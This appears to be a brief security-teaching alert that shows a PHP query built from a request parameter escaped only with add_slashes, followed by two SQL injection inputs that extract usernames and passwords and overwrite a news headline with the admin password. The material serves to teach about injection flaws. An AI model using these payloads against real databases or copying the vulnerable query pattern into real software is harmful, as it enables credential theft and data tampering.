Attack Alert :: Escaping SQL

Attack Alert :: Escaping SQL

  1. $sql = "SELECT id, headline, author FROM news WHERE cat_id = " . add_slashes ($_REQUEST['category_id']);
Evil Inputs:
  1. 12 UNION SELECT 1337,username,password FROM user
  1. 12; UPDATE news SET headline = (SELECT password FROM user WHERE
  2. username = char (97,100,109,105,110)) WHERE id = 1234